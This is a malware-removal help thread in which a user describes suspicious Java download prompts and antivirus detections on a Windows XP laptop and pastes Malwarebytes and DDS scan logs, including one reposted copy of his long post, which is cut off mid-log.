Solaris_Wave

One more thing, is it recommended to rename ComboFix to something else entirely, to prevent any malware blocking it from doing its work?

Hi Chris, Sorry for the delay. I had some other non-PC related issues to take care of. Also, I ran a virus scan with Avira before carrying out the tasks you asked me to do. It was only a quick system scan but still took over an hour. It reported five virus detections (although the event log only shows three). I couldn't find much info on them and the malware all had uninteresting and unrecognised names. When I ran a scan a few days beforehand it didn't find a thing so I was surprised it found that many. I had the following reported: The file 'C:\Documents and Settings\UBA\Local Settings\Temp\Main.class' contained a virus or unwanted program 'EXP/2011-3544.EE' [exploit] The file 'C:\Documents and Settings\UBA\Application Data\Sun\Java\Deployment\cache\6.0\31\2720a2df-2b19f17d' contained a virus or unwanted program 'EXP/CVE-2012-0507' [exploit] The file 'C:\Documents and Settings\UBA\My Documents\v2.txt' contained a virus or unwanted program 'EXP/CVE-2010-1885' [exploit] All files were quarantined. The last file, v2.txt, was what I had copied and pasted into Notepad. It was the long string of characters that was part of the address in the download request from de.exoticbeijing (mentioned in my second post). I thought it was harmless because I saved it as a text file but Avira really didn't like it so I guess I made a mistake. That was also what alerted Avira when I had posted that script here, as part of my message full of symptoms. Hopefully I haven't accidentally posted some nasty script in this thread that can run (I don't know how easy it is for malware to do its business)! I don't think these detections are related to my initial problems but I could be wrong seeing as they are Java related. I did another quick scan and no more detections were found. I haven't done any recent full scans though as that takes at least five hours to do when my external drive is connected. It's only 50% full as well. I will do another full scan soon though. I reset my router and flushed the DNS cache. The IP/DNS settings were already set to be obtained automatically but I OK'd and rebooted, just to say that I had done it. I haven't seen any changes but to be honest I don't know what I am looking for. There are still multiple connections according to Netstat but they may be related to Avira's WebGuard. One of Online Armour's System Tray programs shows active connections. I keep seeing three System/TCP connections running and then AVWEBGRD.EXE/TCP connections. The latter keep appearing and disappearing and there always seems to be several of them connecting. They do this regardless of whether I am using the internet or not. I did another MBAM scan and those two detections will keep coming back unless I set them to be ignored. I haven't tried letting MBAM fix the 'problems' because I believe I know what they are related to. It is strange though that my Windows 7 netbook does not cause MBAM to display these alerts, as I have Windows Updates set to manual and my IE homepage locked in the same fashion as this Win XP laptop. I will try ComboFix next as that is the only thing I have not done yet. Please could you tell me if it is okay to keep my external hard disk connected when I run ComboFix? Regards, Paul

Hi Chris, I've reposted my second post again, with a larger font. The formatting seems to have gone a bit strange somewhere though because it insists on either being really small text or really large where everything is messed up. Even now I have set it to a higher font size than what makes sense (it should look huge if I used this size normally). Nevertheless, hopefully it will be easier to read for you! In the meantime, I will carry out your recent instructions. The post is as follows: I've copied and pasted the two logs you have requested, with some additional information either relating to the logs or from the behaviour of my PC. I have separated each log and my own input with lines so you are not looking at a solid wall of text. Unfortunately, it is a lengthy post because I have tried to be as detailed as possible. I have been writing everything down (or copying into Notepad) anything I haven't liked the look of. First up is the MBAM log: _________________________________________________________________________________________________________________________________________ Malwarebytes Anti-Malware (PRO) 1.61.0.1400 www.malwarebytes.org Database version: v2012.04.10.08 Windows XP Service Pack 3 x86 NTFS Internet Explorer 8.0.6001.18702 UBA :: TSP-A40 [administrator] Protection: Enabled 10/04/2012 19:57:13 mbam-log-2012-04-10 (20-05-45).txt Scan type: Quick scan Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM Scan options disabled: P2P Objects scanned: 176319 Time elapsed: 7 minute(s), 47 second(s) Memory Processes Detected: 0 (No malicious items detected) Memory Modules Detected: 0 (No malicious items detected) Registry Keys Detected: 0 (No malicious items detected) Registry Values Detected: 0 (No malicious items detected) Registry Data Items Detected: 2 HKCU\SOFTWARE\Policies\Microsoft\Internet Explorer\control panel|Homepage (PUM.Hijack.HomePageControl) -> Bad: (1) Good: (0) -> No action taken. HKLM\SOFTWARE\Microsoft\Security Center|UpdatesDisableNotify (PUM.Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken. Folders Detected: 0 (No malicious items detected) Files Detected: 0 (No malicious items detected) (end) _________________________________________________________________________________________________________________________________________ There are two things I would like to comment on here. Firstly, you will see that I have the Pro version of MBAM. I preferred to post on here as opposed to e-mailing support because I really didn't like the idea of accessing my e-mail account on this PC. I have also avoided logging into any sites that require passwords on this particular PC, with the exception of this forum, as I don't trust it. Next up, regarding the MBAM log are the two reported warnings. I normally have those set to be ignored so they don't appear everytime I scan. I removed those for the time being so that they would appear and just skipped fixing them. I'm not sure which software or setting affects these two warnings but I have deliberately disabled notification of Windows Updates (if that is indeed one of the warnings) as I prefer to search for updates manually. With the exception of certain software such as my anti-virus, firewall and MBAM, I don't like things running in the background, hogging my internet connection or doing things to my PC when I am trying to use it for other tasks. The second warning about the Homepage hijack may be related to Spyware Blaster. I have that set to block changes to my Internet Explorer homepage. I do have control over changing it myself however. Nevertheless if you feel that these warnings in MBAM need fixing or my settings need changing, then please feel free to tell me. Next up is the DDS.txt log. I saw the warning to disable any script blocking tools but I wasn't sure what they might be. Therefore I didn't change anything and DDS ran fine anyway. Was I supposed to disable any anti-malware software at all (Avira, Online Armour, MBAM or Spyware Blaster)? _________________________________________________________________________________________________________________________________________ . DDS (Ver_2011-08-26.01) - NTFSx86 Internet Explorer: 8.0.6001.18702 Run by UBA at 20:07:32 on 2012-04-10 Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.1007.485 [GMT 1:00] . AV: AntiVir Desktop *Enabled/Updated* {C19476D9-52BC-4E93-8AF3-CCF59F7AE8FE} FW: Online Armor Firewall *Enabled* . ============== Running Processes =============== . C:\WINDOWS\system32\svchost -k DcomLaunch svchost.exe C:\WINDOWS\System32\svchost.exe -k netsvcs svchost.exe C:\WINDOWS\Explorer.EXE svchost.exe C:\Program Files\Tall Emu\Online Armor\OAcat.exe C:\Program Files\Tall Emu\Online Armor\oasrv.exe C:\WINDOWS\system32\spoolsv.exe C:\Program Files\Avira\AntiVir Desktop\sched.exe svchost.exe C:\Program Files\Avira\AntiVir Desktop\avguard.exe C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe C:\WINDOWS\System32\svchost.exe -k HTTPFilter C:\Program Files\Avira\AntiVir Desktop\avshadow.exe C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\Program Files\Avira\AntiVir Desktop\avmailc.exe C:\Program Files\Avira\AntiVir Desktop\AVWEBGRD.EXE C:\WINDOWS\System32\hkcmd.exe C:\WINDOWS\System32\00THotkey.exe C:\WINDOWS\LTSMMSG.exe C:\Program Files\Apoint2K\Apoint.exe C:\Program Files\TOSHIBA\TouchED\TouchED.Exe C:\Program Files\TOSHIBA\PadTouch\PadExe.exe C:\WINDOWS\system32\TFNF5.exe C:\WINDOWS\system32\TPSMain.exe C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe C:\Program Files\Tall Emu\Online Armor\oaui.exe C:\WINDOWS\system32\TPSBattM.exe C:\Program Files\Avira\AntiVir Desktop\avgnt.exe C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe C:\Program Files\Windows Media Player\WMPNSCFG.exe C:\Program Files\Apoint2K\Apntex.exe C:\Program Files\Tall Emu\Online Armor\OAhlp.exe C:\Program Files\GetRight\GetRight.exe C:\Program Files\Logitech\SetPoint\SetPoint.exe C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE . ============== Pseudo HJT Report =============== . uStart Page = hxxp://home.live.com/ BHO: Adobe PDF Link Helper: {18df081c-e8ad-4283-a596-fa578c2ebdc3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelperShim.dll BHO: IE to GetRight Helper: {31ff080d-12a3-439a-a2ef-4ba95a3148e8} - c:\program files\getright\xx2gr.dll BHO: Java™ Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\java\jre6\bin\jp2ssv.dll EB: {32683183-48a0-441b-a342-7c2a440a9478} - No File uRun: [WMPNSCFG] c:\program files\windows media player\WMPNSCFG.exe uRunOnce: [shockwave Updater] c:\windows\system32\adobe\shockwave 11\SwHelper_1151601.exe -Update -1151601 -"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" -"http://www.adobe.com...ckwave/welcome/" mRun: [igfxTray] c:\windows\system32\igfxtray.exe mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe mRun: [00THotkey] c:\windows\system32\00THotkey.exe mRun: [000StTHK] 000StTHK.exe mRun: [LTSMMSG] LTSMMSG.exe mRun: [Apoint] c:\program files\apoint2k\Apoint.exe mRun: [TouchED] c:\program files\toshiba\touched\TouchED.Exe mRun: [PadTouch] "c:\program files\toshiba\padtouch\PadExe.exe mRun: [TFNF5] TFNF5.exe mRun: [TPSMain] TPSMain.exe mRun: [TFncKy] TFncKy.exe mRun: [@OnlineArmor GUI] "c:\program files\tall emu\online armor\oaui.exe" mRun: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE mRun: [Adobe Reader Speed Launcher] "c:\program files\adobe\reader 9.0\reader\Reader_sl.exe" mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe" mRun: [sunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe" mRun: [avgnt] "c:\program files\avira\antivir desktop\avgnt.exe" /min mRun: [Malwarebytes' Anti-Malware] "c:\program files\malwarebytes' anti-malware\mbamgui.exe" /starttray StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\getright.lnk - c:\program files\getright\GetRight.exe StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\logite~1.lnk - c:\program files\logitech\setpoint\SetPoint.exe IE: Download with GetRight - c:\program files\getright\GRdownload.htm IE: Open with GetRight Browser - c:\program files\getright\GRbrowse.htm IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe LSP: c:\program files\avira\antivir desktop\avsda.dll DPF: {166B1BCA-3F9C-11CF-8075-444553540000} - hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab DPF: {233C1507-6A77-46A4-9443-F871F945D258} - hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} - hxxp://www.update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1264487526468 DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab DPF: {CAFEEFAC-0016-0000-0020-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab TCP: DhcpNameServer = 192.168.1.254 TCP: Interfaces\{1C7A2F47-0733-4991-854B-E312D1FE6FE7} : DhcpNameServer = 192.168.1.254 Notify: igfxcui - igfxsrvc.dll Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll SEH: OA Shell Helper: {4f07da45-8170-4859-9b5f-037ef2970034} - c:\progra~1\tallem~1\online~1\oaevent.dll Hosts: 127.0.0.1 www.spywareinfo.com . ================= FIREFOX =================== . FF - ProfilePath - c:\documents and settings\uba\application data\mozilla\firefox\profiles\05slwm2p.default\ FF - prefs.js: network.proxy.type - 0 FF - plugin: c:\program files\divx\divx plus web player\npdivx32.dll FF - plugin: c:\program files\java\jre6\bin\new_plugin\npdeployJava1.dll FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_11_2_202_228.dll . ============= SERVICES / DRIVERS =============== . R1 avgio;avgio;c:\program files\avira\antivir desktop\avgio.sys [2010-12-15 11608] R1 OADevice;OADriver;c:\windows\system32\drivers\OADriver.sys [2009-10-15 200784] R1 OAmon;OAmon;c:\windows\system32\drivers\OAmon.sys [2009-10-15 24656] R1 OAnet;OAnet;c:\windows\system32\drivers\OAnet.sys [2009-10-15 29776] R2 AntiVirMailService;Avira AntiVir MailGuard;c:\program files\avira\antivir desktop\avmailc.exe [2010-12-15 340136] R2 AntiVirSchedulerService;Avira AntiVir Scheduler;c:\program files\avira\antivir desktop\sched.exe [2010-12-15 136360] R2 AntiVirService;Avira AntiVir Guard;c:\program files\avira\antivir desktop\avguard.exe [2010-12-15 269480] R2 AntiVirWebService;Avira AntiVir WebGuard;c:\program files\avira\antivir desktop\avwebgrd.exe [2010-12-15 428200] R2 avgntflt;avgntflt;c:\windows\system32\drivers\avgntflt.sys [2010-12-15 66616] R2 MBAMService;MBAMService;c:\program files\malwarebytes' anti-malware\mbamservice.exe [2010-10-14 654408] R2 OAcat;Online Armor Helper Service;c:\program files\tall emu\online armor\oacat.exe [2009-10-15 1244360] R2 SvcOnlineArmor;Online Armor;c:\program files\tall emu\online armor\oasrv.exe [2009-10-15 3184328] R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2010-10-14 22344] S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32 \macromed\flash\FlashPlayerUpdateService.exe [2012-4-1 253600] . =============== Created Last 30 ================ . 2012-04-10 14:59:12 711240 ----a-w- c:\windows\isRS-000.tmp 2012-04-04 18:56:08 -------- d-----w- c:\documents and settings\uba\local settings\application data\Mozilla 2012-04-04 10:29:42 -------- d-----w- c:\program files\Microsoft Windows 7 Upgrade Advisor 2012-04-02 22:47:58 -------- d-----w- c:\program files\HitmanPro 2012-04-02 22:47:51 -------- d-----w- c:\documents and settings\all users\application data\HitmanPro 2012-04-02 18:21:06 -------- d-----w- c:\documents and settings\uba\local settings\application data\NPE 2012-04-02 18:21:06 -------- d-----w- c:\documents and settings\all users\application data\Norton 2012-04-01 16:11:55 70304 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl 2012-04-01 16:11:55 418464 ----a-w- c:\windows\system32\FlashPlayerApp.exe . ==================== Find3M ==================== . 2012-04-04 14:56:40 22344 ----a-w- c:\windows\system32\drivers\mbam.sys 2012-03-31 10:13:21 66616 ----a-w- c:\windows\system32\drivers\avgntflt.sys . ============= FINISH: 20:10:51.20 =============== _________________________________________________________________________________________________________________________________________ Since running DDS in my first post, I have installed Firefox (which I normally use on another PC), installed Windows 7 Upgrade Adviser (just to see what kind of result it would give me, even though I wasn't planning to install W7 on this PC (and the Adviser always crashes), and also installed Hitman Pro, just to test it. Additionally I also switched on my external HDD as the bulk of my data is on there. I don't know if the latter makes any difference to DDS' results though. I have not installed any Windows Updates for XP since last year as I didn't want to alter the OS too much if the PC is infected. Likewise, I haven't updated Java for the same reasons. Please could you view my first post for details on why those are out of date, if that is ok. I never used Firefox on this PC in the past and only used Internet Explorer. IE runs terribly slow and temporarily freezes frequently when visiting sites. That may be down to poor hardware specs though as Firefox does likewise (although vastly less often). In fact, the PC behaves slowly and freezes sometimes even when no browsers are being used. MBAM takes a long time to update and spends most of its time saying it is connecting to the server (in contrast, my netbook PC connects to the MBAM servers instantly but is more modern (if not all that powerful), runs Windows 7 and has different anti-virus and firewall software). This PC never shuts down properly either and I have to press the power switch to complete the Shutting Down process. This occurred the same day as I started seeing the strange download requests. I thought the download prompts were exclusive to Internet Explorer (I thought it was an IE window appearing) but installing Firefox told me otherwise. Those prompts appear in FF also. They all seem to be related to sites that use Java. As well as the sites mentioned in my first post, I recently tried Runescape.com and the British Telecom speed test site. Whenever I visit sites such as these, I get the window asking me to download something, with the publisher always being listed as Microsoft Corporation. This is highly suspect seeing as those sites won't have anything to do with MS. Also, there is always a problem with the signature verification, saying that it has expired or is invalid. I always cancel the request to download. The site's application will then display and run as normal. If not, then another prompt appears with the publisher being far more likely (e.g. Jagex for Runescape). The digital signature is also verified. Before I recently removed it, I visited an old bookmark (while using IE) that I had added a few years ago. Not remembering what it was, I visited it. I know for sure it wasn't a bad site (pirated software, pornography, etc.). I got redirected to one of those old screens saying Congratulations, you're our 1000th visitor of the day. Click here to go claim your prize. I haven't seen those damn things in ages. Annoyingly I couldn't close it and it wasn't a popup. I couldn't even close IE normally and everytime I tried to close it with Task Manager, the End Program window kept disappearing everytime I tried to get my mouse pointer near it. Another site had been replaced with a screen full of banner ads. This one was more alarming as Avira's Web Guard said it blocked TR/ Ramnit. E. At the same time, I saw a prompt appear saying the following: Do you want to allow this website to open a program on your computer? From: de.exoticbeijing.com Program: Microsoft Help and Support Center Address: (This was a very long script. I have copied and pasted it into Notepad but haven't displayed it here just in case that caused the virus warning). I cancelled it and haven't seen anything like that since. I don't know if that was just something lying in wait at the now dodgy website or is related to the problems I have been seeing. Seeing Microsoft appear once again made me wonder. Also, there was the fact that Avira listed Ramnit and one site I noted visiting, shortly before my accident last year when I last used this PC, asked if I wanted to download something called cpak.Crimepack (with the same Java related prompt). I once read about that and Ramnit got mentioned at the same time. I have since removed lots of bookmarks, if they are not ones that I remember or recognise. I'm sure I added them myself, as opposed to them being rogue but they were more than likely added years ago. I had a habit of adding bookmarks to look at later and then not deleting them. Once again, sorry for the lengthy post. As always, I wanted to give as much detail as possible. Kind regards, Paul

Just to add to my last post, this was what Avira shows in its logs when I tried to post in this thread: When accessing data from the URL, "http://forums.malwarebytes.org/index.php?app=forums&module=ajax&section=topics&do=reply&t=108096&f=7&pid=541212" a virus or unwanted program 'HTML/rug.A.3' [virus] was found. Action taken: Blocked file

Hi Chris, That was a very fast response. I don't know if you had a chance to read my second post because I uploaded it shortly before you posted a reply. Also, as soon as I clicked on Post, Avira came up with a virus warning and I denied access. I then saw the site freezing as it was saying it was saving the post (and then got stuck on it). I opened a new window and saw that the post had been uploaded fine. I don't know what the virus warning was though unless it was to do with that script that I copied and pasted from one of those suspect download prompts. I was about to remove that part of my post. Also, I don't know why the font for my second post is so small! It did that by default. Would you like me to repost it, with larger text so you don't need a magnifying glass? To answer your question, yes I am connected through a router. I have it wired only, with wireless disabled. No other PC is connected at this time as I didn't want to risk infection. I am keeping the two PCs separate and will reset the router before connecting the other PC. The only other thing connected is my XBox 360 but that hasn't been used for some time due to my injuries (paralysis). Seeing as I just posted an MBAM log before you replied, would you like me to post another before trying ComboFix? Regards, Paul Edited by screen317 to merge last post with this oneJust to add to my last post, this was what Avira shows in its logs when I tried to post in this thread: When accessing data from the URL, "http://forums.malwar...&f=7&pid=541212" a virus or unwanted program 'HTML/rug.A.3' [virus] was found. Action taken: Blocked file

Hello Chris, Thank you for your assistance! I've copied and pasted the two logs you have requested, with some additional information either relating to the logs or from the behaviour of my PC. I have separated each log and my own input with lines so you are not looking at a solid wall of text. Unfortunately, it is a lengthy post because I have tried to be as detailed as possible. I have been writing everything down (or copying into Notepad) anything I haven't liked the look of. First up is the MBAM log: _________________________________________________________________________________________________________________________________________ Malwarebytes Anti-Malware (PRO) 1.61.0.1400 www.malwarebytes.org Database version: v2012.04.10.08 Windows XP Service Pack 3 x86 NTFS Internet Explorer 8.0.6001.18702 UBA :: TSP-A40 [administrator] Protection: Enabled 10/04/2012 19:57:13 mbam-log-2012-04-10 (20-05-45).txt Scan type: Quick scan Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM Scan options disabled: P2P Objects scanned: 176319 Time elapsed: 7 minute(s), 47 second(s) Memory Processes Detected: 0 (No malicious items detected) Memory Modules Detected: 0 (No malicious items detected) Registry Keys Detected: 0 (No malicious items detected) Registry Values Detected: 0 (No malicious items detected) Registry Data Items Detected: 2 HKCU\SOFTWARE\Policies\Microsoft\Internet Explorer\control panel|Homepage (PUM.Hijack.HomePageControl) -> Bad: (1) Good: (0) -> No action taken. HKLM\SOFTWARE\Microsoft\Security Center|UpdatesDisableNotify (PUM.Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken. Folders Detected: 0 (No malicious items detected) Files Detected: 0 (No malicious items detected) (end) _________________________________________________________________________________________________________________________________________ There are two things I would like to comment on here. Firstly, you will see that I have the Pro version of MBAM. I preferred to post on here as opposed to e-mailing support because I really didn't like the idea of accessing my e-mail account on this PC. I have also avoided logging into any sites that require passwords on this particular PC, with the exception of this forum, as I don't trust it. Next up, regarding the MBAM log are the two reported warnings. I normally have those set to be ignored so they don't appear everytime I scan. I removed those for the time being so that they would appear and just skipped fixing them. I'm not sure which software or setting affects these two warnings but I have deliberately disabled notification of Windows Updates (if that is indeed one of the warnings) as I prefer to search for updates manually. With the exception of certain software such as my anti-virus, firewall and MBAM, I don't like things running in the background, hogging my internet connection or doing things to my PC when I am trying to use it for other tasks. The second warning about the Homepage hijack may be related to Spyware Blaster. I have that set to block changes to my Internet Explorer homepage. I do have control over changing it myself however. Nevertheless if you feel that these warnings in MBAM need fixing or my settings need changing, then please feel free to tell me. Next up is the DDS.txt log. I saw the warning to disable any script blocking tools but I wasn't sure what they might be. Therefore I didn't change anything and DDS ran fine anyway. Was I supposed to disable any anti-malware software at all (Avira, Online Armour, MBAM or Spyware Blaster)? _________________________________________________________________________________________________________________________________________ . DDS (Ver_2011-08-26.01) - NTFSx86 Internet Explorer: 8.0.6001.18702 Run by UBA at 20:07:32 on 2012-04-10 Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.1007.485 [GMT 1:00] . AV: AntiVir Desktop *Enabled/Updated* {C19476D9-52BC-4E93-8AF3-CCF59F7AE8FE} FW: Online Armor Firewall *Enabled* . ============== Running Processes =============== . C:\WINDOWS\system32\svchost -k DcomLaunch svchost.exe C:\WINDOWS\System32\svchost.exe -k netsvcs svchost.exe C:\WINDOWS\Explorer.EXE svchost.exe C:\Program Files\Tall Emu\Online Armor\OAcat.exe C:\Program Files\Tall Emu\Online Armor\oasrv.exe C:\WINDOWS\system32\spoolsv.exe C:\Program Files\Avira\AntiVir Desktop\sched.exe svchost.exe C:\Program Files\Avira\AntiVir Desktop\avguard.exe C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe C:\WINDOWS\System32\svchost.exe -k HTTPFilter C:\Program Files\Avira\AntiVir Desktop\avshadow.exe C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\Program Files\Avira\AntiVir Desktop\avmailc.exe C:\Program Files\Avira\AntiVir Desktop\AVWEBGRD.EXE C:\WINDOWS\System32\hkcmd.exe C:\WINDOWS\System32\00THotkey.exe C:\WINDOWS\LTSMMSG.exe C:\Program Files\Apoint2K\Apoint.exe C:\Program Files\TOSHIBA\TouchED\TouchED.Exe C:\Program Files\TOSHIBA\PadTouch\PadExe.exe C:\WINDOWS\system32\TFNF5.exe C:\WINDOWS\system32\TPSMain.exe C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe C:\Program Files\Tall Emu\Online Armor\oaui.exe C:\WINDOWS\system32\TPSBattM.exe C:\Program Files\Avira\AntiVir Desktop\avgnt.exe C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe C:\Program Files\Windows Media Player\WMPNSCFG.exe C:\Program Files\Apoint2K\Apntex.exe C:\Program Files\Tall Emu\Online Armor\OAhlp.exe C:\Program Files\GetRight\GetRight.exe C:\Program Files\Logitech\SetPoint\SetPoint.exe C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE . ============== Pseudo HJT Report =============== . uStart Page = hxxp://home.live.com/ BHO: Adobe PDF Link Helper: {18df081c-e8ad-4283-a596-fa578c2ebdc3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelperShim.dll BHO: IE to GetRight Helper: {31ff080d-12a3-439a-a2ef-4ba95a3148e8} - c:\program files\getright\xx2gr.dll BHO: Java Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\java\jre6\bin\jp2ssv.dll EB: {32683183-48a0-441b-a342-7c2a440a9478} - No File uRun: [WMPNSCFG] c:\program files\windows media player\WMPNSCFG.exe uRunOnce: [shockwave Updater] c:\windows\system32\adobe\shockwave 11\SwHelper_1151601.exe -Update -1151601 -"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" -"http://www.adobe.com/shockwave/welcome/" mRun: [igfxTray] c:\windows\system32\igfxtray.exe mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe mRun: [00THotkey] c:\windows\system32\00THotkey.exe mRun: [000StTHK] 000StTHK.exe mRun: [LTSMMSG] LTSMMSG.exe mRun: [Apoint] c:\program files\apoint2k\Apoint.exe mRun: [TouchED] c:\program files\toshiba\touched\TouchED.Exe mRun: [PadTouch] "c:\program files\toshiba\padtouch\PadExe.exe mRun: [TFNF5] TFNF5.exe mRun: [TPSMain] TPSMain.exe mRun: [TFncKy] TFncKy.exe mRun: [@OnlineArmor GUI] "c:\program files\tall emu\online armor\oaui.exe" mRun: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE mRun: [Adobe Reader Speed Launcher] "c:\program files\adobe\reader 9.0\reader\Reader_sl.exe" mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe" mRun: [sunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe" mRun: [avgnt] "c:\program files\avira\antivir desktop\avgnt.exe" /min mRun: [Malwarebytes' Anti-Malware] "c:\program files\malwarebytes' anti-malware\mbamgui.exe" /starttray StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\getright.lnk - c:\program files\getright\GetRight.exe StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\logite~1.lnk - c:\program files\logitech\setpoint\SetPoint.exe IE: Download with GetRight - c:\program files\getright\GRdownload.htm IE: Open with GetRight Browser - c:\program files\getright\GRbrowse.htm IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe LSP: c:\program files\avira\antivir desktop\avsda.dll DPF: {166B1BCA-3F9C-11CF-8075-444553540000} - hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab DPF: {233C1507-6A77-46A4-9443-F871F945D258} - hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} - hxxp://www.update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1264487526468 DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab DPF: {CAFEEFAC-0016-0000-0020-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab TCP: DhcpNameServer = 192.168.1.254 TCP: Interfaces\{1C7A2F47-0733-4991-854B-E312D1FE6FE7} : DhcpNameServer = 192.168.1.254 Notify: igfxcui - igfxsrvc.dll Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll SEH: OA Shell Helper: {4f07da45-8170-4859-9b5f-037ef2970034} - c:\progra~1\tallem~1\online~1\oaevent.dll Hosts: 127.0.0.1 www.spywareinfo.com . ================= FIREFOX =================== . FF - ProfilePath - c:\documents and settings\uba\application data\mozilla\firefox\profiles\05slwm2p.default\ FF - prefs.js: network.proxy.type - 0 FF - plugin: c:\program files\divx\divx plus web player\npdivx32.dll FF - plugin: c:\program files\java\jre6\bin\new_plugin\npdeployJava1.dll FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_11_2_202_228.dll . ============= SERVICES / DRIVERS =============== . R1 avgio;avgio;c:\program files\avira\antivir desktop\avgio.sys [2010-12-15 11608] R1 OADevice;OADriver;c:\windows\system32\drivers\OADriver.sys [2009-10-15 200784] R1 OAmon;OAmon;c:\windows\system32\drivers\OAmon.sys [2009-10-15 24656] R1 OAnet;OAnet;c:\windows\system32\drivers\OAnet.sys [2009-10-15 29776] R2 AntiVirMailService;Avira AntiVir MailGuard;c:\program files\avira\antivir desktop\avmailc.exe [2010-12-15 340136] R2 AntiVirSchedulerService;Avira AntiVir Scheduler;c:\program files\avira\antivir desktop\sched.exe [2010-12-15 136360] R2 AntiVirService;Avira AntiVir Guard;c:\program files\avira\antivir desktop\avguard.exe [2010-12-15 269480] R2 AntiVirWebService;Avira AntiVir WebGuard;c:\program files\avira\antivir desktop\avwebgrd.exe [2010-12-15 428200] R2 avgntflt;avgntflt;c:\windows\system32\drivers\avgntflt.sys [2010-12-15 66616] R2 MBAMService;MBAMService;c:\program files\malwarebytes' anti-malware\mbamservice.exe [2010-10-14 654408] R2 OAcat;Online Armor Helper Service;c:\program files\tall 